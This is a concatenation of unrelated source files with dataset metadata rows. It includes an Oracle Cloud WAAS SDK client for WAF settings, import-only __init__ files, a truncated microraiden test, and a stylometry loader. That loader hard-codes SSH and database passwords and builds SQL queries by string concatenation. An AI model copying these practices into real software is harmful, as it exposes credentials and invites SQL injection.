        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retry strategy: attach the idempotency token and retry headers.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_threat_feeds(self, waas_policy_id, threat_feeds, **kwargs):
    """
    Updates the action to take when a request's IP address matches an address in
    the specified threat intelligence feed. Threat intelligence feeds are compiled
    lists of IP addresses with malicious reputations based on internet
    intelligence. Only the threat feeds specified in the request body will be
    updated; all other threat feeds will remain unchanged.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.list[ThreatFeedAction] threat_feeds: (required)
        A list of threat feeds for which to update the actions.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when
        contacting Oracle about a particular request.

    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous `GET` or
        `POST` response for this resource. The update only proceeds if it matches
        the resource's current etag.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any client-level
        strategy. Use one of the strategies in :py:mod:`~oci.retry`, or
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response
        object. By default they are not allowed.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    target_path = "/waasPolicies/{waasPolicyId}/wafConfig/threatFeeds"
    http_method = "PUT"

    # Reject keyword arguments this operation does not understand.
    # Note: no opc_retry_token here -- this operation takes no retry token.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "if_match"
    ]
    unknown = [name for name in kwargs if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "update_threat_feeds got unknown kwargs: {!r}".format(unknown))

    # Path templating: the WAAS policy id must be a non-empty, non-whitespace value.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {name: value for name, value in path_params.items() if value is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only send optional headers that were actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for kwarg_name, header_name in (("opc_request_id", "opc-request-id"),
                                    ("if_match", "if-match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=target_path,
        method=http_method,
        path_params=path_params,
        header_params=header_params,
        body=threat_feeds)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retry strategy: attach retry headers (no retry token for this op).
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_waas_policy(self, waas_policy_id, update_waas_policy_details, **kwargs):
    """
    Updates the details of a WAAS policy, including origins and tags. Only the
    fields specified in the request body will be updated; all other properties
    will remain unchanged.

    To update platform provided resources such as `GoodBots`, `ProtectionRules`,
    and `ThreatFeeds`, first retrieve the list of available resources with the
    related list operation such as `GetThreatFeeds` or `GetProtectionRules`.
    The returned list will contain objects with `key` properties that can be used
    to update the resource during the `UpdateWaasPolicy` request.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.UpdateWaasPolicyDetails update_waas_policy_details: (required)
        The details of the WAAS policy to update.

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. Provide it when
        contacting Oracle about a particular request.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried after a
        timeout or server error without re-executing the action. Retry tokens
        expire after 24 hours but may be invalidated earlier by conflicting
        operations.

    :param str if_match: (optional)
        For optimistic concurrency control: the etag from a previous `GET` or
        `POST` response for this resource. The update only proceeds if it matches
        the resource's current etag.

    :param obj retry_strategy: (optional)
        A retry strategy for this specific call, overriding any client-level
        strategy. Use one of the strategies in :py:mod:`~oci.retry`, or
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are permitted in strings of the response
        object. By default they are not allowed.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    target_path = "/waasPolicies/{waasPolicyId}"
    http_method = "PUT"

    # Reject keyword arguments this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unknown = [name for name in kwargs if name not in allowed_kwargs]
    if unknown:
        raise ValueError(
            "update_waas_policy got unknown kwargs: {!r}".format(unknown))

    # Path templating: the WAAS policy id must be a non-empty, non-whitespace value.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {name: value for name, value in path_params.items() if value is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only send optional headers that were actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for kwarg_name, header_name in (("opc_request_id", "opc-request-id"),
                                    ("opc_retry_token", "opc-retry-token"),
                                    ("if_match", "if-match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=target_path,
        method=http_method,
        path_params=path_params,
        header_params=header_params,
        body=update_waas_policy_details)

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Real retry strategy: attach the idempotency token and retry headers.
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_waas_policy_custom_protection_rules(self, waas_policy_id, update_custom_protection_rules_details, **kwargs):
    """
    Updates the action for each specified custom protection rule. Only the
    `DETECT` and `BLOCK` actions can be set; disabled rules should not be
    included in the list.

    :param str waas_policy_id: (required)
        The OCID of the WAAS policy.
    :param oci.waas.models.list[CustomProtectionRuleSetting] update_custom_protection_rules_details: (required)
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str opc_retry_token: (optional)
        Token that makes a retried request idempotent.
    :param str if_match: (optional)
        Etag value for optimistic concurrency control.
    :param obj retry_strategy: (optional)
        Per-operation retry strategy, overriding any client-level strategy.
    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.
    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/customProtectionRules"
    method = "PUT"

    # Reject keyword arguments this operation does not recognize.
    recognized = (
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    )
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in recognized]
    if unrecognized:
        raise ValueError(
            "update_waas_policy_custom_protection_rules got unknown kwargs: {!r}".format(unrecognized))

    # Validate and collect the templated path parameters.
    path_params = {}
    for name, value in six.iteritems({"waasPolicyId": waas_policy_id}):
        if value is missing:
            continue
        path_params[name] = value
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble request headers, keeping only the optional ones actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the call exactly once.
    if not retry_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=update_custom_protection_rules_details)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
    retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=update_custom_protection_rules_details)
def update_waf_address_rate_limiting(self, waas_policy_id, update_waf_address_rate_limiting_details, **kwargs):
    """
    Updates the address rate limiting settings in the Web Application Firewall
    configuration for a policy.

    :param str waas_policy_id: (required)
        The OCID of the WAAS policy.
    :param oci.waas.models.AddressRateLimiting update_waf_address_rate_limiting_details: (required)
        The address rate limiting settings.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str opc_retry_token: (optional)
        Token that makes a retried request idempotent.
    :param str if_match: (optional)
        Etag value for optimistic concurrency control.
    :param obj retry_strategy: (optional)
        Per-operation retry strategy, overriding any client-level strategy.
    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.
    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/addressRateLimiting"
    method = "PUT"

    # Reject keyword arguments this operation does not recognize.
    recognized = (
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    )
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in recognized]
    if unrecognized:
        raise ValueError(
            "update_waf_address_rate_limiting got unknown kwargs: {!r}".format(unrecognized))

    # Validate and collect the templated path parameters.
    path_params = {}
    for name, value in six.iteritems({"waasPolicyId": waas_policy_id}):
        if value is missing:
            continue
        path_params[name] = value
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble request headers, keeping only the optional ones actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the call exactly once.
    if not retry_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=update_waf_address_rate_limiting_details)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
    retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=update_waf_address_rate_limiting_details)
def update_waf_config(self, waas_policy_id, update_waf_config_details, **kwargs):
    """
    Updates the Web Application Firewall configuration for a specified WAAS
    policy. To update platform provided resources (`GoodBots`,
    `ProtectionRules`, `ThreatFeeds`), first retrieve the available resources
    with the related list operation and use the returned `key` properties in
    this request.

    :param str waas_policy_id: (required)
        The OCID of the WAAS policy.
    :param oci.waas.models.WafConfig update_waf_config_details: (required)
        The new Web Application Firewall configuration to apply to a WAAS policy.
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str opc_retry_token: (optional)
        Token that makes a retried request idempotent.
    :param str if_match: (optional)
        Etag value for optimistic concurrency control.
    :param obj retry_strategy: (optional)
        Per-operation retry strategy, overriding any client-level strategy.
    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.
    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig"
    method = "PUT"

    # Reject keyword arguments this operation does not recognize.
    recognized = (
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    )
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in recognized]
    if unrecognized:
        raise ValueError(
            "update_waf_config got unknown kwargs: {!r}".format(unrecognized))

    # Validate and collect the templated path parameters.
    path_params = {}
    for name, value in six.iteritems({"waasPolicyId": waas_policy_id}):
        if value is missing:
            continue
        path_params[name] = value
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble request headers, keeping only the optional ones actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the call exactly once.
    if not retry_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=update_waf_config_details)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
    retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=update_waf_config_details)
def update_whitelists(self, waas_policy_id, whitelists, **kwargs):
    """
    Updates the list of IP addresses that bypass the Web Application Firewall
    for a WAAS policy. Supports single IP addresses, subnet masks (CIDR
    notation) and Address Lists. Depending on the request body this operation
    can create (no `key`), update/reorder (existing `key`), or delete
    (omitted `key`) whitelists.

    :param str waas_policy_id: (required)
        The OCID of the WAAS policy.
    :param oci.waas.models.list[Whitelist] whitelists: (required)
    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.
    :param str opc_retry_token: (optional)
        Token that makes a retried request idempotent.
    :param str if_match: (optional)
        Etag value for optimistic concurrency control.
    :param obj retry_strategy: (optional)
        Per-operation retry strategy, overriding any client-level strategy.
    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.
    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/whitelists"
    method = "PUT"

    # Reject keyword arguments this operation does not recognize.
    recognized = (
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    )
    unrecognized = [name for name in six.iterkeys(kwargs) if name not in recognized]
    if unrecognized:
        raise ValueError(
            "update_whitelists got unknown kwargs: {!r}".format(unrecognized))

    # Validate and collect the templated path parameters.
    path_params = {}
    for name, value in six.iteritems({"waasPolicyId": waas_policy_id}):
        if value is missing:
            continue
        path_params[name] = value
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Assemble request headers, keeping only the optional ones actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Without a retry strategy, issue the call exactly once.
    if not retry_strategy:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            path_params=path_params,
            header_params=header_params,
            body=whitelists)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
    retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(
        self.base_client.call_api,
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=whitelists)
| 52.8872
| 440
| 0.664875
| 47,854
| 372,273
| 4.994504
| 0.017762
| 0.057873
| 0.019096
| 0.00577
| 0.934362
| 0.921981
| 0.913747
| 0.907429
| 0.900647
| 0.88889
| 0
| 0.000916
| 0.257827
| 372,273
| 7,038
| 441
| 52.894714
| 0.86414
| 0.466821
| 0
| 0.847921
| 0
| 0
| 0.158323
| 0.031389
| 0
| 0
| 0
| 0
| 0
| 1
| 0.018326
| false
| 0.000547
| 0.002462
| 0
| 0.057166
| 0.003556
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a09da78813ff89c8d5f7ca2f4db554184b32a9c
| 221
|
py
|
Python
|
genomat/stats/__init__.py
|
Aluriak/Genomat
|
fda307949b7192018b8ab19566cb505e984d5e56
|
[
"Unlicense"
] | null | null | null |
genomat/stats/__init__.py
|
Aluriak/Genomat
|
fda307949b7192018b8ab19566cb505e984d5e56
|
[
"Unlicense"
] | null | null | null |
genomat/stats/__init__.py
|
Aluriak/Genomat
|
fda307949b7192018b8ab19566cb505e984d5e56
|
[
"Unlicense"
] | null | null | null |
import genomat.stats.stats
import genomat.stats.networks
import genomat.stats.profiles
#import genomat.stats.stats as stats
#import genomat.stats.networks as networks
#import genomat.stats.profiles as profiles
| 31.571429
| 43
| 0.800905
| 30
| 221
| 5.9
| 0.2
| 0.440678
| 0.610169
| 0.259887
| 0.689266
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.131222
| 221
| 6
| 44
| 36.833333
| 0.921875
| 0.547511
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e14bc6a4b9f6351adf390a8b335edd5fdf93e207
| 5,948
|
py
|
Python
|
TransferLearning_AuthorshipID/data.py
|
aman7895/DeepLearningResearch
|
de7bc777f8253e164e2658e816a9c6a45f3e93e7
|
[
"MIT"
] | null | null | null |
TransferLearning_AuthorshipID/data.py
|
aman7895/DeepLearningResearch
|
de7bc777f8253e164e2658e816a9c6a45f3e93e7
|
[
"MIT"
] | null | null | null |
TransferLearning_AuthorshipID/data.py
|
aman7895/DeepLearningResearch
|
de7bc777f8253e164e2658e816a9c6a45f3e93e7
|
[
"MIT"
] | null | null | null |
# coding: utf-8
# In[ ]:
#generate graphs with chunk_size, batch size
import psycopg2
import pandas as pd
import nltk
import re #This is to parse the HTML code from the given text
from sshtunnel import SSHTunnelForwarder #This is to connect to the local Database
def getCharAuthorData(authors, doc, tdoc, documentTable = 'aman_content', chunk_size = 1000):
    """Fetch training documents for the given authors and split them into
    fixed-size character chunks.

    Connects to the stylometry database through an SSH tunnel, selects every
    document whose author_id is in ``authors`` and whose doc_id is in ``tdoc``
    (excluding ``doc`` itself), strips HTML tags and newlines from the content,
    then splits each document into chunks of at most ``chunk_size`` characters.

    :param authors: iterable of author ids to include.
    :param doc: doc_id of the held-out document to exclude from training.
    :param tdoc: iterable of doc_ids eligible for training.
    :param documentTable: name of the database table to query.
    :param chunk_size: maximum number of characters per chunk.
    :return: ``pd.DataFrame`` with columns ``author_id`` and ``doc_content``.
    """
    import sys  # bug fix: sys is used on the error path but was never imported

    df = pd.DataFrame()
    conn = None
    output = []
    try:
        with SSHTunnelForwarder(("srn01.cs.cityu.edu.hk", 22),
                                ssh_username='stylometry',
                                ssh_password='stylometry',
                                remote_bind_address=('localhost', 5432),
                                local_bind_address=('localhost', 5400)):
            conn = psycopg2.connect(user="stylometry", password="stylometry",
                                    database="stylometry", host="localhost", port=5400)
            cur = conn.cursor()
            # NOTE(review): the query is assembled by string concatenation; this is
            # only safe while the ids are trusted integers. Prefer parameterized
            # queries (cur.execute with placeholders) if any value can be untrusted.
            query = ("SELECT author_id, doc_content FROM " + str(documentTable)
                     + " WHERE author_id IN (" + ", ".join(str(a) for a in authors) + ")"
                     + " AND NOT doc_id = " + str(doc)
                     + " AND doc_id IN (" + ", ".join(str(d) for d in tdoc) + ") ;")
            cur.execute(query)
            print(query)
            print("Execution completed")
            rows = cur.fetchall()
            print("Read completed")
            print("Number of rows: %s" % (len(rows)))
            for row in rows:
                # Drop HTML tags and newlines before chunking the raw characters.
                text = re.sub('<[^<]+?>', '', row[1])
                text = text.replace("\r\n", "").replace("\n", "")
                # Slice into chunks of exactly chunk_size characters; the final
                # chunk of a document may be shorter.
                for start in range(0, len(text), chunk_size):
                    output.append([row[0], text[start:start + chunk_size]])
            df = pd.DataFrame(output, columns=["author_id", "doc_content"])
            print(df.dtypes)
            print("Data Frame created: Shape: %s" % (str(df.shape)))
    except psycopg2.Error as e:
        if conn:
            conn.rollback()
        print('Error %s' % e)
        sys.exit(1)
    finally:
        # Always release the database connection, even when exiting on error.
        if conn is not None:
            conn.close()
    return df
def getCharDocData(authors, doc, documentTable = 'aman_content', chunk_size = 1000):
    """Fetch one document by id and split it into fixed-size character chunks.

    Connects to the stylometry database through an SSH tunnel, selects the
    document whose doc_id equals ``doc``, strips HTML tags and newlines from
    the content, then splits it into chunks of at most ``chunk_size``
    characters.

    :param authors: unused here; kept for signature parity with
        :func:`getCharAuthorData`.
    :param doc: doc_id of the document to fetch.
    :param documentTable: name of the database table to query.
    :param chunk_size: maximum number of characters per chunk.
    :return: ``pd.DataFrame`` with columns ``author_id`` and ``doc_content``.
    """
    import sys  # bug fix: sys is used on the error path but was never imported

    df = pd.DataFrame()
    conn = None
    output = []
    try:
        with SSHTunnelForwarder(("srn01.cs.cityu.edu.hk", 22),
                                ssh_username='stylometry',
                                ssh_password='stylometry',
                                remote_bind_address=('localhost', 5432),
                                local_bind_address=('localhost', 5400)):
            conn = psycopg2.connect(user="stylometry", password="stylometry",
                                    database="stylometry", host="localhost", port=5400)
            cur = conn.cursor()
            # NOTE(review): string-built SQL; safe only while doc is a trusted
            # integer id — prefer a parameterized query otherwise.
            query = "SELECT author_id, doc_content FROM " + str(documentTable) + " WHERE"
            query += " doc_id = '" + str(doc) + "' ;"
            cur.execute(query)
            print("Execution completed")
            rows = cur.fetchall()
            print("Read completed")
            print("Number of rows: %s" % (len(rows)))
            for row in rows:
                # Drop HTML tags and newlines before chunking the raw characters.
                text = re.sub('<[^<]+?>', '', row[1])
                text = text.replace("\r\n", "").replace("\n", "")
                # Slice into chunks of exactly chunk_size characters; the final
                # chunk may be shorter.
                for start in range(0, len(text), chunk_size):
                    output.append([row[0], text[start:start + chunk_size]])
            df = pd.DataFrame(output, columns=["author_id", "doc_content"])
            print(df.dtypes)
            print("Data Frame created: Shape: %s" % (str(df.shape)))
    except psycopg2.Error as e:
        if conn:
            conn.rollback()
        print('Error %s' % e)
        sys.exit(1)
    finally:
        # Always release the database connection, even when exiting on error.
        if conn is not None:
            conn.close()
    return df
# In[ ]:
'''
authors=[123, 80, 75]
doc = 204
df = getCharAuthorData(authors, doc, documentTable = 'aman_content', chunk_size = 1000)
'''
| 32.326087
| 104
| 0.421822
| 560
| 5,948
| 4.417857
| 0.241071
| 0.006467
| 0.021019
| 0.029103
| 0.826597
| 0.813662
| 0.775667
| 0.775667
| 0.752627
| 0.752627
| 0
| 0.030103
| 0.463853
| 5,948
| 183
| 105
| 32.502732
| 0.745688
| 0.049092
| 0
| 0.857143
| 1
| 0
| 0.111897
| 0.007617
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015038
| false
| 0.030075
| 0.037594
| 0
| 0.067669
| 0.097744
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e16688f8fea4c7921401b7718654817095487056
| 360
|
py
|
Python
|
networkx/linalg/__init__.py
|
Tscheik/networkx
|
19a8d540afac21eced23cf06a47f496f164039e9
|
[
"BSD-3-Clause"
] | 1
|
2018-08-09T14:29:43.000Z
|
2018-08-09T14:29:43.000Z
|
networkx/linalg/__init__.py
|
Tscheik/networkx
|
19a8d540afac21eced23cf06a47f496f164039e9
|
[
"BSD-3-Clause"
] | null | null | null |
networkx/linalg/__init__.py
|
Tscheik/networkx
|
19a8d540afac21eced23cf06a47f496f164039e9
|
[
"BSD-3-Clause"
] | null | null | null |
from networkx.linalg.attrmatrix import *
import networkx.linalg.attrmatrix
from networkx.linalg.spectrum import *
import networkx.linalg.spectrum
from networkx.linalg.graphmatrix import *
import networkx.linalg.graphmatrix
from networkx.linalg.laplacianmatrix import *
import networkx.linalg.laplacianmatrix
from networkx.linalg.algebraicconnectivity import *
| 36
| 51
| 0.858333
| 41
| 360
| 7.536585
| 0.219512
| 0.407767
| 0.291262
| 0.33657
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077778
| 360
| 9
| 52
| 40
| 0.930723
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e1b61b5be0c0a54ea11d84d31c075649bdda1be0
| 33
|
py
|
Python
|
src/vaulter_py/__init__.py
|
Shreejan-35/VAULTERPY
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | 2
|
2022-03-27T21:56:18.000Z
|
2022-03-30T09:06:29.000Z
|
src/vaulter_py/__init__.py
|
Shreejan-35/PYVAULT
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | null | null | null |
src/vaulter_py/__init__.py
|
Shreejan-35/PYVAULT
|
91823a880b406b8958eb4bb91ee311671c39eae2
|
[
"MIT"
] | null | null | null |
from .passvault import Passvault
| 16.5
| 32
| 0.848485
| 4
| 33
| 7
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.121212
| 33
| 1
| 33
| 33
| 0.965517
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
e1c5c2e15a0c102fb655c54f8954d23780fbad38
| 5,059
|
py
|
Python
|
contracts/tests/test_channel_delegate.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 417
|
2017-09-19T19:06:23.000Z
|
2021-11-28T05:39:23.000Z
|
contracts/tests/test_channel_delegate.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 259
|
2017-09-19T20:42:57.000Z
|
2020-11-18T01:31:41.000Z
|
contracts/tests/test_channel_delegate.py
|
andrevmatos/microraiden
|
2d51e78afaf3c0a8ddab87e59a5260c0064cdbdd
|
[
"MIT"
] | 126
|
2017-09-19T17:11:39.000Z
|
2020-12-17T17:05:27.000Z
|
import pytest
from ethereum import tester
def test_channel_erc223_create_delegate(
        owner,
        get_accounts,
        uraiden_instance,
        token_instance,
        delegate_instance,
        get_block):
    """A trusted delegate contract can open a channel via the ERC223 path."""
    (sender, receiver) = get_accounts(2)
    deposit = 1000
    # ERC223 transfer data: 20-byte sender address followed by 20-byte
    # receiver address (hex strings with the leading '0x' stripped).
